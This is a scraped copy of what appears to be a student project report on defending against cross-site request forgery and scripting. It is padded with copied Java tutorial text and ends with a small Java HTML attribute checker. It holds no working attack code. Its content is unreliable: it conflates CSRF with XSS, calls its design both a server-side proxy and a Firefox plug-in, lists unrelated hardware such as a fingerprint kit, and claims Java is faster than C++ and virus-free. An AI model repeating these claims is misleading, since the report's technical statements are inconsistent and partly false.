cross site
TRANSCRIPT
-
8/3/2019 Cross Site
1/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
CHAPTER 1
INTRODUCTION
Cross site request forgery (abbreviated XSRF or CSRF, sometimes also called
Session Riding), denotes a relatively new class of attack against web application users.
By launching a successful XSRF attack against a user, an adversary is able to initiate
arbitrary HTTP requests from that user to the vulnerable web application. Thus, if the
victim is authenticated, a successful XSRF attack effectively bypasses the underlying
authentication mechanism. Depending on the web application, the attacker could, for
instance, post messages or send mails in the name of the victim, or even change the
victims login name and password. Furthermore, the damage caused by such attacks can
be severe. In contrast to the well-known web security problems such as SQL injection
and XSS, cross site request forgery (XSRF) appears to be a problem that is little known
by web application developers and the academic community.
As a result, only few mitigation solutions exist. Unfortunately, these solutions do
not offer complete protection against XSRF or require significant modifications to each
individual web application that should be protected. In this paper, we present a solution
that provides protection from XSRF attacks. More precisely, our approach is based on a
server-side proxy that detects and prevents XSRF attacks in a way that is transparent to
users as well as to the web application itself. One important advantage of our solution is
that there is only minimal manual effort required to protect existing applications. Our
experimental results demonstrate that we can use our prototype to secure a number of
popular open-source web applications against XSRF attacks, without negatively affecting
1
-
8/3/2019 Cross Site
2/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
the applications behavior. An expanded version of this paper containing additional
details can be found on our web site.
1.1 OVERVIEW OF SYSTEM
We propose a CSRF attack detection mechanism to alleviate the current
limitations. Our approach is based on the notions of visibility and content , and it can be
considered as a layer of defense in depth. Note that it should not be considered as a
solution to CSRF that frees a development organization from coding securely.The
visibility relates the supplied parameters and values of a suspected request with one of the
windows that is displaying a web page from the target website. We are motivated by the
fact that if a request supplies information to a trusted website(e.g., a form
submission),one of the open windows in the browser must relate to the request.The
content notion is based on the observation that a sensitive request generates a response
that should be visible(e.g., generation of a new page) to let a user know about the
outcome of his or her request.
In contrast , an attack request is hidden in JavaScript code or URL attributes of
HTML tags and does not result in any visible response. As a result ,the expected contenttype does not match with the actual content type returned by a server program for a
suspected request. For example ,an attack request can be set as the source URL of an
image and the response should be an image file(e.g., image/jpeg) .However , the response
content type of an attack request might be text/html which does not match with the
expected content.
2
-
8/3/2019 Cross Site
3/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
CHAPTER 2
SYSTEM ANALYSIS
2.1 Existing System
There are several browser-based approaches that suffer from several
limitations. Most of the tehniques rely on cross-origin policies (i.e., white listed URL
patterns that are allowed to launch from browsers). Cross-origin policies may not be
configured correctly and a badly configured policy always allows cross-origin requests
launched and makes the defense ineffective
Moreover, these approaches focus on the detection of reflected CSRF
attacks (i.e., attack payloads reside in third party websites that are vulnerable to XSS),
and they might not detect stored CSRF attacks (i.e., attack payloads reside in trusted
websites that are vulnerable to XSS).
2.1.1 Disadvantages of the Existing system
Users can unknowingly execute malicious scripts when viewing dynamically
generated pages based on content provided by an attacker.
An attacker can take over the user session before the user's session cookie expires.
An attacker can connect users to a malicious server of the attacker's choice.
An attacker who can convince a user to access a URL supplied by the attacker could
cause script or HTML of the attacker's choice to be executed in the user's browser.
2.2 Proposed System
We propose a CSRF attack detection mechanism to alleviate the current
limitations. Our approach is based on the notions of visibility and content, and it can be
3
-
8/3/2019 Cross Site
4/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
considered as a layer of defense in depth. In this system we propose the detection of
CSRF attacks with the notion of visibility and content checking of suspected requests.
The idea is to intercept a suspected request containing parameters and values and relate
them with one of the visible forms present in an open window.
If there is an exact match, we modify the suspected request to make it
benign, launch it to the remote website, and identify the content type, and match with the
expected content type. Any mismatch between request attribute values or content type
results in a warning.
Our proposed approach does not rely on cross-origin policy or server side
program states. Moreover, it does not require storing URLs or tokens to be matched at a
later stage for attack detection. The proposed approach is implemented as a Fire fox plug-
in and evaluated for three real world programs vulnerable to both CSRF and XSS.
2.2.1 Advantages of Proposed system
No need of separate storage for storing urls.
Not allow the user to enter into cross site
Alert the user whenever they try to enter the cross -site
More secured
Efficient detection process
4
-
8/3/2019 Cross Site
5/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
CHAPTER 3
DEVELOPMENT ENVIRONMENT
3.1 HARDWARE REQUIREMENTS
Hard disk : 40 GB
RAM : 128mb
Processor : Pentium
keypad
Mobile phone with data cable
3.2 SOFTWARE REQUIREMENTS
J2EE,SWING
Windows 98 or more.
MS-SQL Server
Finger print STK 2007
5
-
8/3/2019 Cross Site
6/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
3.3 SOFTWARE REQUIREMENT SPECIFICATIONS
3.3.1 FEATURES OF JAVA
Accessibility from any location in the world:
1.) Java is an internet programming language
2.) The web provides accessibility to a computer
from anywhere in the world
Virus free System:
1.)Java is secure
2.)That is any changes made to the computer are
tagged as errors and the program will not execute
Platform Independent Language:
1.)java compiler compiles java code to an
intermediate byte code that is understood by
JVM(java virtual machine)
2.)To execute the byte codes the system should
have java interpreter or java enabled internet
browser
Speed:
1.)java is a High performance language
6
-
8/3/2019 Cross Site
7/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
2.)faster than programs written in other interpreter
languages, such as BASIC
3.)faster than C, C++.
Development time:
1.)java is simple
2.)in java programmers do not need to manipulate
memory
3.3.2 THE JAVA PROGRAMMING LANGUAGE
The Java programming language is a high-level language that can be
characterized by all of the following buzzwords:
Simple Architecture neutral
Object oriented Portable
Distributed High performance
Multithreaded Robust
Dynamic Secure
Each of the preceding buzzwords is explained in The Java Language
Environment, a white paper written by James Gosling and Henry McGilton.
In the Java programming language, all source code is first written in plain text
files ending with the .java extension. Those source files are then compiled into .class
files by the javac compiler. A .class file does not contain code that is native to your
processor; it instead contains bytecodes the machine language of the Java Virtual
7
-
8/3/2019 Cross Site
8/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Machine1 (Java VM). The java launcher tool then runs your application with an instance
of the Java Virtual Machine.
3.3.3ANOVERVIEW OF SOFTWARE DEVELOPMENT PROCESS
Because the Java VM is available on many different operating systems, the
same .class files are capable of running on Microsoft Windows, the Solaris TM
Operating System (Solaris OS), Linux, or Mac OS. Some virtual machines, such as the
Java HotSpot virtual machine, perform additional steps at runtime to give your
application a performance boost. This include various tasks such as finding performance
bottlenecks and recompiling (to native code) frequently used sections of code.
8
http://java.sun.com/docs/books/tutorial/getStarted/intro/definition.html#FOOT%23FOOThttp://java.sun.com/products/hotspot/http://java.sun.com/docs/books/tutorial/getStarted/intro/definition.html#FOOT%23FOOThttp://java.sun.com/products/hotspot/ -
8/3/2019 Cross Site
9/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Through the Java VM, the same application is capable of
running on multiple platforms.
The Java Platform
A platform is the hardware or software environment in which a program runs.
We've already mentioned some of the most popular platforms like Microsoft Windows,
Linux, Solaris OS, and Mac OS. Most platforms can be described as a combination of the
operating system and underlying hardware. The Java platform differs from most other
platforms in that it's a software-only platform that runs on top of other hardware-based
platforms.
The Java platform has two components:
The Java Virtual Machine
The Java Application Programming Interface (API)
You've already been introduced to the Java Virtual Machine; it's the base for the Java
platform and is ported onto various hardware-based platforms.
The API is a large collection of ready-made software components that provide
many useful capabilities. It is grouped into libraries of related classes and interfaces;
these libraries are known as packages. The next section, What Can Java Technology Do?
highlights some of the functionality provided by the API.
9
http://java.sun.com/docs/books/tutorial/getStarted/intro/cando.htmlhttp://java.sun.com/docs/books/tutorial/getStarted/intro/cando.html -
8/3/2019 Cross Site
10/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
The API and Java Virtual Machine insulate the program
from the underlying hardware.
As a platform-independent environment, the Java platform can be a bit slower
than native code. However, advances in compiler and virtual machine technologies are
bringing performance close to that of native code without threatening portability.
3.3.4. COMPONENTS
Visual controls such as textboxes, checkboxes, listboxes, buttons & combo
boxes are called components. Each component inherits the properties of its parent
container such as font & color.
Containers:
Top level windows that hold these components are called containers. The
container also controls the position of components placed in it
10
-
8/3/2019 Cross Site
11/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Frame Window:
Containers are contained within the frame window, which is another
type of a container
The framewindow is the top level window & as such it does not have a
parent container.
AWT(abstract window toolkit):
In java 1.0 user interfaces are created using AWT. The front end applications
created using AWT is different on different platforms.
Java Foundation Classes(JFC):
JFC is an extension of the original AWT.
JFC is an extension of AWT.
JFC is first delivered as a part of the java platform
It has a rich set of components that are completely cross platform
independent & offer improved performance
We can create large scale internet & intranet applications using Jfc.
This lesson gives you a brief introduction to using the Java Foundation
Classes (JFC) Swing packages. After telling you about JFC and Swing, it helps you get
the necessary software and walks you through how to compile and run a program that
uses the Swing packages. Next, it shows you how to run programs using Java Web Start.
The next lesson, learning swing by example, will build on these first steps to
help you create several increasingly more complex examples. For now, let's start with the
basics.
11
-
8/3/2019 Cross Site
12/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Compiling and running of swing process
This section gives you detailed instructions on how to install, create, compile
and run a program that uses Swing components.
About JFC and swing
JFC is short for Java Foundation Classes, which encompass a group of features
for building graphical user interfaces (GUIs) and adding rich graphics functionality and
interactivity to Java applications. It is defined as containing the features shown in the
table below.
Features of the Java Foundation Classes
Feature Description
Swing GUIComponents
Includes everything from buttons to split panes to tables.
Pluggable Look-and-
Feel Support
Gives any program that uses Swing components a choice of look and
feel. For example, the same program can use either the Java or the
Windows look and feel. Many more look-and-feel packages are
available from various sources. As of v1.4.2, the Java platform
supports the GTK+ look and feel, which makes hundreds of existing
look and feels available to Swing programs.
Accessibility APIEnables assistive technologies, such as screen readers and Braille
displays, to get information from the user interface.
Java 2D API
Enables developers to easily incorporate high-quality 2D graphics,
text, and images in applications and applets. Java 2D includes
extensive APIs for generating and sending high-quality output to
printing devices.
Drag-and-Drop
Support
Provides the ability to drag and drop between Java applications and
native applications.
Internationalization
Allows developers to build applications that can interact with users
worldwide in their own languages and cultural conventions. With the
input method framework developers can build applications that
accept text in languages that use thousands of different characters,
such as Japanese, Chinese, or Korean.
12
-
8/3/2019 Cross Site
13/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
This trail concentrates on the Swing components. We help you choose the
appropriate components for your GUI, tell you how to use them, and give you the
background information you need to use them effectively. We also discuss other JFC
features as they apply to Swing components.
Version Note: "Swing" was the code name of the project that developed the new
components. Although unofficial, it's frequently used to refer to the new components and
related API. "Swing" is immortalized in the package names for the Swing API, which
begin with javax.swing.
3.3.5 ABOUT JSP TECHNOLOGY
JSP
Java Server Pages or JSP for short is Sun's solution for developing dynamic web sites.
JSP provide excellent server side scripting support for creating database driven web
applications. JSP enable the developers to directly insert java code into jsp file, this
makes the development process very simple and its maintenance also becomes very easy.
JSP pages are efficient, it loads into the web servers memory on receiving the request
very first time and the subsequent calls are served within a very short period of time.
In today's environment most web sites servers dynamic pages based on user
request. Database is very convenient way to store the data of users and other things.
JDBC provide excellent database connectivity in heterogeneous database environment.
Using JSP and JDBC its very easy to develop database driven web application.
Java is known for its characteristic of "write once, run anywhere." JSP pages
are platform independent. Your port your .jsp pages to any platform.
JSP ARCHITECTURE
13
-
8/3/2019 Cross Site
14/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
JSP pages are high level extension of servlet and it enable the developers
to embed java code in html pages. JSP files are finally compiled into a servlet by the JSP
engine. Compiled servlet is used by the engine to serve the requests.
javax.servlet.jsp package defines two interfaces:
JSPPage
HttpJspPage
These interfaces defines the three methods for the compiled JSP page. These methods
are:
jspInit()
jspDestroy()
_jspService(HttpServletRequest request,HttpServletResponse response)
In the compiled JSP file these methods are present. Programmer can define jspInit() and
jspDestroy() methods, but the _jspService(HttpServletRequest
request,HttpServletResponse response) method is generated by the JSP engine.
3.4 ADDITIONAL FEATURES OF JAVA
Development Tools: The development tools provide everything you'll need for
compiling, running, monitoring, debugging, and documenting your applications.
As a new developer, the main tools you'll be using are the javac compiler, the
java launcher, and the javadoc documentation tool.
Application Programming Interface (API): The API provides the core
functionality of the Java programming language. It offers a wide array of useful
classes ready for use in your own applications. It spans everything from basic
objects, to networking and security, to XML generation and database access, and
14
-
8/3/2019 Cross Site
15/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
more. The core API is very large; to get an overview of what it contains, consult
the Java SE Development Kit 6 (JDKTM 6) documentation.
Deployment Technologies: The JDK software provides standard mechanisms
such as the Java Web Start software and Java Plug-In software for deploying your
applications to end users.
User Interface Toolkits: The Swing and Java 2D toolkits make it possible to
create sophisticated Graphical User Interfaces (GUIs).
Integration Libraries: Integration libraries such as the Java IDL API, JDBC TM
API, Java Naming and Directory InterfaceTM
("J.N.D.I.") API, Java RMI, and Java
Remote Method Invocation over Internet Inter-ORB Protocol Technology (Java
RMI-IIOP Technology) enable database access and manipulation of remote
objects.
3.4.1 GARBAGE COLLECTION
o Its the process that automatically frees the memory of objects that are no more in
use.
o There is no specification of a technique for garbage collection
How Will Java Technology Change My Life?
We can't promise you fame, fortune, or even a job if you learn the Java
programming language. Still, it is likely to make your programs better and requires less
effort than other languages. We believe that Java technology will help you do the
following:
15
http://java.sun.com/javase/6/docs/index.htmlhttp://java.sun.com/javase/6/docs/index.htmlhttp://java.sun.com/javase/6/docs/index.htmlhttp://java.sun.com/javase/6/docs/index.html -
8/3/2019 Cross Site
16/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Get started quickly: Although the Java programming language is a powerful
object-oriented language, it's easy to learn, especially for programmers already
familiar with C or C++.
Write less code: Comparisons of program metrics (class counts, method counts,
and so on) suggest that a program written in the Java programming language can
be four times smaller than the same program written in C++.
Write better code: The Java programming language encourages good coding
practices, and automatic garbage collection helps you avoid memory leaks. Its
object orientation, its JavaBeansTM
component architecture, and its wide-ranging,
easily extendible API let you reuse existing, tested code and introduce fewer bugs.
Develop programs more quickly: The Java programming language is simpler than
C++, and as such, your development time could be up to twice as fast when
writing in it. Your programs will also require fewer lines of code.
Avoid platform dependencies: You can keep your program portable by avoiding
the use of libraries written in other languages.
Write once, run anywhere: Because applications written in the Java programming
language are compiled into machine-independent bytecodes, they run consistently
on any Java platform.
Distribute software more easily: With Java Web Start software, users will be able
to launch your applications with a single click of the mouse. An automatic version
check at startup ensures that users are always up to date with the latest version of
your software. If an update is available, the Java Web Start software will
automatically update their installation.
16
-
8/3/2019 Cross Site
17/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
3.4.2 ENCAPSULATION
A class is a blueprint or prototype from which objects are created.
Objects are key to understanding object-oriented technology.
Objects consist of state and related behavior.
An object stores its state in fields (variables in some programming languages) and
exposes its behavior through methods (functions in some programming
languages).
Methods operate on an object's internal state and serve as the primary mechanism
for object-to-object communication. Hiding internal state and requiring all interaction to
be performed through an object's methods is known as data encapsulation a
fundamental principle of object-oriented programming.
3.4.3 INHERITANCE
Object-oriented programming allows classes to inherit commonly used state and behavior
from other classes.
In the Java programming language, each class is allowed to have one direct
superclass, and each superclass has the potential for an unlimited number of
subclasses.
Syntax: At the beginning of your class declaration, use the extends keyword,
followed by the name of the class to inherit from
17
-
8/3/2019 Cross Site
18/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
3.4.4 INTERFACE
An interface is a contract between a class and the outside world, and this contract
is enforced at build time by the compiler.
When a class implements an interface, it promises to provide the behavior
published by that interface.
Implementing an interface allows a class to become more formal about the
behavior it promises to provide
3.4.5 PACKAGES.
Using import statement we can use java packages in a program (its similar to
include statement in C++)
Package contains only classes, whereas a header file can contain independent
methods.
They have hierarchical structure
If the package name is not specified class becomes the member of the default
package
3.5 HANDLING EVENTS
Every time the user types a character or pushes a mouse button, an event
occurs. Any object can be notified of the event. All the object has to do is implement the
appropriate interface and be registered as an event listener on the appropriate event
source.
18
-
8/3/2019 Cross Site
19/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Swing Applicationclass implements an event handler for button clicks
(action events). Heres the relevant code:
public class Swing Application implements ActionListener {
...
JButton button = new JButton("I'm a Swing button!");
button.addActionListener(this);
....
public void actionPerformed(ActionEvent e) {
numClicks++;label.setText(labelPrefix + numClicks);
}
}
Every event handler requires three pieces of code:
In the declaration for the event handler class, one line of code specifies
that the class either implements a listener interface or extends a class that implements
a listener interface. For example:
public class MyClass implements ActionListener {
Another line of code registers an instance of the event handler class as a listener on
one or more components. For example:
someComponent.addActionListener(instanceOfMyClass);
The event handler class has code that implements the methods in the listener interface.
For example:
public void actionPerformed(ActionEvent e) {
...//code that reacts to the action... }
19
-
8/3/2019 Cross Site
20/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
In general, to detect when the user clicks an onscreen button (or does the keyboard
equivalent), a program must have an object that implements the ActionListener
interface. The program must register this object as an action listener on the button (the
event source), using the addActionListenermethod. When the user clicks the onscreen
button, the button fires an action event. This results in the invocation of the action
listener's actionPerformedmethod (the only method in the ActionListener interface).
The single argument to the method is an ActionEvent object that gives information
about the event and its source.
Swing components can generate many kinds of events. The following table lists a few
examples.
Some Events and Their Associated Event Listeners
Act that Results in the Event Listener Type
User clicks a button, presses Enter while typing
in a text field, or chooses a menu itemActionListener
User closes a frame (main window) WindowListener
User presses a mouse button while the cursor is
over a componentMouseListener
User moves the mouse over a component MouseMotionListener
Component becomes visible ComponentListener
Component gets the keyboard focus FocusListener
Table or list selection changes ListSelectionListener
Any property in a component changes such as
the text on a labelPropertyChangeListener
To learn more about how to detect events from a particular component, refer to each
component's how-to section inUsing Swing Components.
3.6 CLIENT/SERVER TECHNOLOGY
20
http://java.sun.com/docs/books/tutorial/uiswing/components/index.htmlhttp://java.sun.com/docs/books/tutorial/uiswing/components/index.htmlhttp://java.sun.com/docs/books/tutorial/uiswing/components/index.html -
8/3/2019 Cross Site
21/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Client/Server computing is an environment that distributes processing
accross many computers. Client/Server system is used to access different
databases or services via a network though two-tier or three-tier
architecture.
Figure 1: Two-tier Architecture for Data Access.
"The job of a client is to request for a service and the job of the server is to serve
the request."
Basically there are two types of clients.
1. Dependent Clients.
2. Independent Client.
Dependent clients are such clients who can connect only to a single database while
independent clients connect to various databases through some specific
DBMSindependent standards like ODBC(Open Database Connectivity), JDBC etc.
21
-
8/3/2019 Cross Site
22/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
CHAPTER 4
SYSTEM DESIGN
4.1 ARCHITECTURE DIAGRAM
Figure: 4.1 Architecture diagram
22
-
8/3/2019 Cross Site
23/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
4.2 USECASE DIGRAM
Figure: 4.2 Use case diagram
4.3 SEQUENCE DIAGRAM
Attacker
File a page with Malicious script
Legitimate Server
Attacker's Server
View the page filled by the
Attacker
Html containing Malicious Script
Run
Data Send to the AttakServer
Malicious script
User browser
Data send to userbrowser
23
-
8/3/2019 Cross Site
24/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
AttackerAttacker User browser User browser Malicious scriptMalicious script Attacker's
server
Attacker's
server
Legitimate
server
Legitimate
server
1: Construct a malicious script
2: Email the Url to user and conviince user to click on it
3: Request the page
4: page with malicious script
5: Run
6: Authorzed Request
Figure: 4.3 Sequence diagram
4.4 DATA FLOW DIAGRAM
24
-
8/3/2019 Cross Site
25/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Figure: 4.4 Dataflow diagram
25
-
8/3/2019 Cross Site
26/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
CHAPTER 5
PROJECT DESCRIPTION
5.1 PROJECT DEFINITION
Nowadays cross-site attack is increasingly grown and makes a threat to all
internet users. The users as well as the trusted site also not aware of this type of attacks
and they lose their confidential data to the hackers site.
Solution
This project is implemented to over come all types of cross site attacks even it
may be stored attack or reflected attack. This system not allow the user to enter into any
cross site like wise it detect the cross site also based on some mechanisms like visibility
checking and content checking.
5.2 .MODULE DESCRIPTION
1. Client
2. Legitimate server
3. Malicious script
4. Filtering
5. Attackers server
6. Cross-site detection and alert system
26
-
8/3/2019 Cross Site
27/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
1. Clients browser
Client can access any website via any browser. The browser which is used by
the client currently to access any site is known as clients browser. It may be any
browser. Client can access any sites it may be cross site or trusted website.
2. Legitimate server
Legitimate server is nothing but it is a trusted website which holds all the
services which are needed by many clients. Based on the user request it provides the
service. Some times the hackers may write some unwanted malicious code in a trusted
site also. Whenever client access the legitimate server the malicious code also started to
run.
3. Malicious script
When the user unknowingly executes scripts written by an attacker they follow a
malicious link in a mail message. Because the malicious scripts are executed in a context
that appears to have originated from the legitimate server, the attacker has full access to
the document retrieved and may send data contained in the page back to their site. If the
embedded script code has additional interactions capability with the legitimate server
without alerting the victim, the attacker could develop and exploit that posted data to a
different page on the legitimate Web server.
4. Filtering
27
-
8/3/2019 Cross Site
28/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
The basis of this approach is never trust user input and always filters Meta
characters ("special" characters) that are defined in the HTML specification. Each input
field, including link parameters will be validated for script tags. When found and
dependent on the context, the input will be rejected and thus prevent the malicious
HTML from being presented to the user.
Filtering is performed based on the following sub modules
Request checker
If a request is a GET type, the destination URL is identified, and the
query string is tokenized to obtain request parameters and values. If a
request is a POST type, the header is examined to obtain the posted
parameters and values as a string, which is tokenized further. If a GET or
POST request contains parameters and values, then it is considered as
suspected and forwarded to the window and form checker module.
Otherwise, it is forwarded to the destination website.
Window and form checker
In the response page, if no window relates the destination domain, we consider
the request as an attack and move program control to attack handler module.
Visibility checking
If the displayed page contains no form, we can conclude that the request is
either a reflected or stored CSRF attack.
Content checking
28
-
8/3/2019 Cross Site
29/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Content checking relies on the matching of the response of a suspected request
with the expected response.
5. Attackers server
The sensitive data which is hacked from the clients browser is stored in the
attackers server. They can miss-use the data in future for hacking the whole system.
Cross-site scripting is achieved when an attacker is able to cause a legitimate Web server
to send a page to a victim user's Web browser that contains a malicious script of the
attacker's choosing. The attacker then has the malicious script run with the privileges of a
legitimate script originating from the legitimate Web server. In this scenario, the attacker
files a page with malicious script to the part of the site that is vulnerable. When the page
is displayed, the malicious script runs, collects the users' cookies, and sends a request to
the attacker's Web site with the cookies gathered. Using this technique, the attacker can
gain sensitive data such as passwords, credit card numbers, and any arbitrary information
the user inputs.
6. Cross-site detection and alert system
If malicious code is detected, that code is forwarded to the attack handler module.
It stops a suspected request and generates a warning to the browser to aware a user of the
deviation identified such as mismatch between the supplied parameters of a request and
the actual parameters present in a form. Moreover, it also reports expected and actual
content type mismatch. A user can allow or disallow a request
29
-
8/3/2019 Cross Site
30/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
CHAPTER 6
TESTING
TESTING:
Testing is a set of activities that can be planned in advance and conducted
systematically. For this reason a template for software testing, a set of steps into which
we can place specific test case design techniques and testing methods should be defined
for software process.
Testing often accounts for more effort than any other software engineering
activity. If it is conducted haphazardly, time is wasted, unnecessary effort is expanded,
and even worse, errors sneak through undetected. It would therefore seem reasonable to
establish a systematic strategy for testing software
Type Of Testing
There are two type of testing according their behaviors
I. Unconventional Testing
II. Conventional Testing
Unconventional Testing
30
-
8/3/2019 Cross Site
31/89
-
8/3/2019 Cross Site
32/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Unit Testing:
The procedure level testing is made first. By giving improper inputs, the errors
occurred are noted and eliminated. Then the web form level testing is made. For example
storage of data to the table in the correct manner.
In the company as well as seeker registration form, the zero length username and
password are given and checked. Also the duplicate username is given and checked. In
the job and question entry, the button will send data to the server only if the client side
validations are made.
The dates are entered in wrong manner and checked. Wrong email-id and web
site URL (Universal Resource Locator) is given and checked.
Integration Testing:
Testing is done for each module. After testing all the modules, the modules
are integrated and testing of the final system is done with the test data, specially designed
to show that the system will operate successfully in all its aspects conditions. Thus the
system testing is a confirmation that all is correct and an opportunity to show the user that
the system works.
Module Test:
32
-
8/3/2019 Cross Site
33/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Module Testing is a process of testing the system, module by module. It includes
the various inputs given, outputs produced and their correctness. By testing in this
method we would be very clear of all the bugs that have occurred.
Interface Testing:
The Interface Testing is performed to verify the interfaces between sub
modules while performing integration of sub modules aiding master module recursively.
Validation Testing:
The final step involves Validation testing, which determines whether the software
function as the user expected. The end-user rather than the system developer conduct this
test most software developers as a process called Alpha and Beta Testing to uncover
that only the end user seems able to find.
The compilation of the entire project is based on the full satisfaction of the end
users. In the project, validation testing is made in various forms.
33
-
8/3/2019 Cross Site
34/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
CHAPTER 7
IMPLEMENTATION AND MAINTENANCE
7.1 IMPLEMENTATION
Implementation is the most crucial stage in achieving a
successful system and giving the users confidence that the new system is workable and
effective. Implementation of a modified application to replace an existing one. This type
of conversation is relatively easy to handle, provide there are no major changes in the
system.
Each program is tested individually at the time of development using the
data and has verified that this program linked together in the way specified in the
programs specification, the computer system and its environment is tested to the
satisfaction of the user. The system that has been developed is accepted and proved to be
satisfactory for the user. And so the system is going to be implemented very soon. A
simple operating procedure is included so that the user can understand the different
functions clearly and quickly.
Initially as a first step the executable form of the application is to be
created and loaded in the common server machine which is accessible to the entire user
and the server is to be connected to a network. The final stage is to document the entire
system which provides components and the operating procedures of the system.
Implementation is the stage of the project when the theoretical design is
turned out into a working system. Thus it can be considered to be the most critical stage
34
-
8/3/2019 Cross Site
35/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
in achieving a successful new system and in giving the user, confidence that the new
system will work and be effective.
The implementation stage involves careful planning, investigation of the
existing system and its constraints on implementation, designing of methods to achieve
changeover and evaluation of changeover methods.
Implementation is the process of converting a new system design into
operation. It is the phase that focuses on user training, site preparation and file conversion
for installing a candidate system. The important factor that should be considered here is
that the conversion should not disrupt the functioning of the organization.
7.2 MAINTENANCE
The objectives of this maintenance work are to make sure that the system gets
into work all time without any bug. Provision must be for environmental changes which
may affect the computer or software system. This is called the maintenance of the system.
Nowadays there is the rapid change in the software world. Due to this rapid change, the
system should be capable of adapting these changes. In our project the process can be
added without affecting other parts of the system.
Maintenance plays a vital role. The system liable to accept any modification after
its implementation. This system has been designed to favour all new changes. Doing this
will not affect the systems performance or its accuracy.
9.2.1Testing Strategies:
35
-
8/3/2019 Cross Site
36/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
A number of software testing strategies have been proposed in the literature.
All provide the software developer with a template for testing and all have the following
generic characteristics:
Testing begins at the component level and works outward
toward the integration of the entire computer-based system.
Different testing techniques are appropriate at different points in
time.
The developer of the software conducts testing and for large
projects, independent test group.
Testing and debugging are different activities, but debugging must
be accommodated in any testing strategy.
36
-
8/3/2019 Cross Site
37/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
CHAPTER 8
CONCLUSION AND FUTURE WORK
8.1 CONCLUSION
In a cross site request forgery (XSRF) attack, the trust of a web application
in its authenticated users is exploited, allowing an attacker to make arbitrary HTTP
requests in the victims name. Unfortunately, current XSRF mitigation techniques have
shortcomings that limit their general applicability. To address this problem, this paper
presents a solution that provides a completely automatic protection from XSRF attacks.
Our approach is based on a server-side proxy that detects and prevents XSRF attacks in a
way that is transparent to users as well as to the web application itself. We have
successfully used our prototype to secure a number of popular open-source web
applications that were vulnerable to XSRF.
Our experimental results demonstrate that the solution is viable, and that we
can secure existing web applications without adversely affecting their behavior.
Currently, XSRF attacks are relatively unknown to both web developers and attackers
that are on the hunt for easy targets. However, we expect the attention paid to this class of
attacks to soon reach that of more traditional web security problems (such as XSS or SQL
injections), and we hope that our solution will prove useful in protecting vulnerable web
applications.
37
-
8/3/2019 Cross Site
38/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
8.2 FUTURE WORK
Our future work includes detection of complex multi-step attacks and the
evaluation of performance penalties for legitimate requests.
38
-
8/3/2019 Cross Site
39/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
CHAPTER 9
APPENDICES
9.1 SAMPLE SOURCE CODE
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.Enumeration;
import javax.swing.text.AttributeSet;
import javax.swing.text.MutableAttributeSet;
import javax.swing.text.html.HTML;
import javax.swing.text.html.HTMLEditorKit;
import javax.swing.*;
public class MainClass {
static ReportAttributes ra=null;
//static String filename="http://localhost:8080/SEARCH/search.html";
// public static void main(String[] args) {
public void check(String filename)
{
ParserGetter kit = new ParserGetter();
HTMLEditorKit.Parser parser = kit.getParser();
39
-
8/3/2019 Cross Site
40/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
HTMLEditorKit.ParserCallback callback = new ReportAttributes();
ra=new ReportAttributes();
System.out.println("kkk");
try {
URL u = new URL(filename);
InputStream in = u.openStream();
InputStreamReader r = new InputStreamReader(in);
parser.parse(r, callback, false);
} catch (IOException e) {
System.err.println(e);
}
}
}
class ReportAttributes extends HTMLEditorKit.ParserCallback {
public String heightstr="",widthstr="";
public void handleStartTag(HTML.Tag tag, MutableAttributeSet attributes, int position)
{
this.listAttributes(attributes);
}
private void listAttributes(AttributeSet attributes) {
Enumeration e = attributes.getAttributeNames();
while (e.hasMoreElements()) {
Object name = e.nextElement();
40
-
8/3/2019 Cross Site
41/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
Object value = attributes.getAttribute(name);
if (!attributes.containsAttribute(name.toString(), value)) {
//System.out.println("containsAttribute() fails");
}
if (!attributes.isDefined(name.toString())) {
//System.out.println("isDefined() fails");
}
//System.out.println("kkkk"+name + "=" +"kkooo"+value);
if((name.toString()).equals("height"))
{
if(value.equals("0"))
{
JOptionPane.showMessageDialog(null,"Malicious Webpage");
}
}
if((name.toString()).equals("width"))
{
if(value.equals("0"))
{
// JOptionPane.showMessageDialog(null,"Malicious Webpage");
}
}
}
}
41
-
8/3/2019 Cross Site
42/89
Defence mechanism and prevention of attack for cross-site scripting forgery________
public void handleSimpleTag(HTML.Tag tag, MutableAttributeSet attributes, int
position) {
this.listAttributes(attributes);
}
}
class ParserGetter extends HTMLEditorKit {
public HTMLEditorKit.Parser getParser() {
return super.getParser();
}
}
